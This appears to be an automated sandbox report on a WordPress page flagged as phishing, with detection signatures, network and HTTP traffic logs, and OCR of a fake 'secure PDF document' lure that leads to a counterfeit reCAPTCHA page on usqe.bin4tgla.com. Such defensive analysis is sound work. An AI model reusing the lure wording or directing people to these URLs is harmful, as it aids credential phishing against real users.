Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://dartergary.wordpress.com/

Overview

General Information

Sample URL:https://dartergary.wordpress.com/
Analysis ID:1544892
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious URL
Phishing site detected (based on shot match)
Phishing site or detected (based on various text indicators)
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1912,i,8132146414401361413,4510033593977308464,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dartergary.wordpress.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_142JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://usqe.bin4tgla.com/fpI2Ggql/LLM: Score: 9 Reasons: The brand 'reCAPTCHA' is well-known and typically associated with the domain 'recaptcha.net'., The provided URL 'usqe.bin4tgla.com' does not match the legitimate domain for reCAPTCHA., The domain 'bin4tgla.com' does not appear to be associated with reCAPTCHA or any known Google services., The URL contains a subdomain 'usqe' which is not typically associated with reCAPTCHA., The presence of unusual subdomains and the lack of association with the legitimate domain suggest a potential phishing attempt. DOM: 2.5.pages.csv
    Source: Yara matchFile source: dropped/chromecache_142, type: DROPPED
    Source: https://usqe.bin4tgla.com/fpI2Ggql/Matcher: Template: captcha matched
    Source: https://usqe.bin4tgla.com/fpI2Ggql/Matcher: Template: captcha matched
    Source: https://usqe.bin4tgla.com/fpI2Ggql/Matcher: Template: captcha matched
    Source: Chrome DOM: 1.0OCR Text: Design a site like this with WordPress.cam Get started New Document Received New File Received ! PDF You've received (2) new PDF Documents for your review Please sign & return VIEW SECURE DOCUMENT
    Source: Chrome DOM: 1.1OCR Text: Design a site like this with WordPress.cam Get started New Document Received New File Received ! PDF You've received (2) new PDF Documents for your review Please sign & return VIEW SECURE DOCUMENT Subscribe
    Source: https://dartergary.wordpress.com/HTTP Parser: Base64 decoded: PN4ynP7J|3f?DMf%V7noZGuBm/fZmiG&n%-K_[yBdWg17D/kAfG+Qcl9mugZ1QEe71PeG-dtY2h81EH1J2gAw+.Zbz~JT%|Y=YBBmj5,RbLXeutwVX.15iWoaCepyFV]/5q~TL6BgO1H=67[uM9n.?fz&[7St|2Wtm3nULA4JntlZ3XKyUbyP586MMCA5Gp8V+rZ|ka/4AKbY9.]w56syDkd4jBcb=O,nLSI]nEXkU,C1+H~.wgBw
    Source: https://dartergary.wordpress.com/HTTP Parser: Title: Site Title does not match URL
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://usqe.bin4tgla.com/fpI2Ggql/HTTP Parser: No favicon
    Source: https://www.asos.com/HTTP Parser: No favicon
    Source: https://www.asos.com/HTTP Parser: No favicon
    Source: https://www.asos.com/HTTP Parser: No favicon
    Source: https://dartergary.wordpress.com/HTTP Parser: No <meta name="author".. found
    Source: https://dartergary.wordpress.com/HTTP Parser: No <meta name="author".. found
    Source: https://dartergary.wordpress.com/HTTP Parser: No <meta name="copyright".. found
    Source: https://dartergary.wordpress.com/HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49754 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49808 version: TLS 1.2
    Source: global trafficTCP traffic: 192.168.2.16:49968 -> 1.1.1.1:53
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dartergary.wordpress.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/blog-plugins/marketing-bar/css/marketing-bar.css?m=1729529312i&cssminify=yes HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_static/??/wp-content/mu-plugins/core-compat/wp-mediaelement.css,/wp-content/mu-plugins/wpcom-bbpress-premium-themes.css?m=1432920480j&cssminify=yes HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_static/??-eJzTLy/QTc7PK0nNK9HPLdUtyClNz8wr1i9KTcrJTwcy0/WTi5G5ekCujj52Temp+bo5+cmJJZn5eSgc3bScxMwikFb7XFtDE1NLExMLc0OTLACohS2q&cssminify=yes HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_static/??/wp-content/js/rlt-proxy.js,/wp-content/mu-plugins/jetpack-plugin/sun/jetpack_vendor/automattic/jetpack-videopress/build/lib/token-bridge.js?m=1724856138j HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/h4/global.css?m=1420737423i&cssminify=yes HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/hovercards/hovercards.min.js?ver=202444448e29c9ec460f70535c7958cd60e9e2980f935c5309d61d08f40d080a876779 HTTP/1.1Host: 0.gravatar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pdf-image.png?w=204 HTTP/1.1Host: fqr44.wordpress.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pdf-image.png?w=204 HTTP/1.1Host: fqr44.wordpress.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i/logo/wpcom-gray-white.png HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/js/mobile-useragent-info.js?m=1609849039i HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /w.js?67 HTTP/1.1Host: stats.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_static/??/wp-content/js/rlt-proxy.js,/wp-content/mu-plugins/jetpack-plugin/sun/jetpack_vendor/automattic/jetpack-videopress/build/lib/token-bridge.js?m=1724856138j HTTP/1.1Host: s0.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZ1rib2Bg-4.woff2 HTTP/1.1Host: fonts.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZ1rib2Bg-4.woff2 HTTP/1.1Host: fonts.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dartergary.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/hovercards/hovercards.min.js?ver=202444448e29c9ec460f70535c7958cd60e9e2980f935c5309d61d08f40d080a876779 HTTP/1.1Host: 0.gravatar.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i HTTP/1.1Host: s2.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i/logo/wpcom-gray-white.png HTTP/1.1Host: s2.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/js/mobile-useragent-info.js?m=1609849039i HTTP/1.1Host: s1.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s0.wp.com/wp-content/blog-plugins/marketing-bar/css/marketing-bar.css?m=1729529312i&cssminify=yesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/hovercards/hovercards.min.css?ver=202444448e29c9ec460f70535c7958cd60e9e2980f935c5309d61d08f40d080a876779 HTTP/1.1Host: 0.gravatar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /w.js?67 HTTP/1.1Host: stats.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.7921517821766884 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /g.gif?blog=238502921&v=wpcom&tz=-4&user_id=0&subd=dartergary&host=dartergary.wordpress.com&ref=&rand=0.82970019227276 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoODFFSDFKMmdBdysuWmJ6fkpUJXxZPVlCQm1qNSxSYkxYZXV0d1ZYLjE1aVdvYUNlcHlGVl0vNXF%2BVEw2QmdPMUg9NjdbdU05bi4%2FZnomWzdTdHwyV3RtM25VTEE0Sm50bFozWEt5VWJ5UDU4Nk1NQ0E1R3A4VityWnxrYS80QUtiWTkuXXc1NnN5RGtkNGpCY2I9TyxuTFNJXW5FWGtVLEMxK0h%2BLndnQnc%3D&v=wpcom-no-pv&rand=0.16543343148914724 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.7-RC1-59308 HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=17YqG79Brj34dSgrHP4bzBgK&_ut=anon&_ts=1730228981995&_tz=4&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdartergary.wordpress.com%2F&_dr=&blog_id=238502921&blog_tz=-4&user_lang=en&blog_lang=en&user_id=0&_rt=1730228981996&_=_ HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /osd.xml HTTP/1.1Host: dartergary.wordpress.comConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
